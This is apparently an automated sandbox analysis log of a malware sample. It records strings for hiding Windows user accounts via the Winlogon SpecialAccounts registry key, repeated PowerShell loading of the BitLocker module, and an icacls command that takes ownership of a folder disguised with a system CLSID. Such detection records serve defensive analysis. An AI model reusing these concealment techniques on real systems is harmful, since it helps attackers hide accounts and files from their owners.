Source: main.exeString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: main.exe, 00000029.00000002.2531413531.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: main.exe, 00000029.00000002.2531413531.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: update.pkg.18.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: update.pkg.18.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
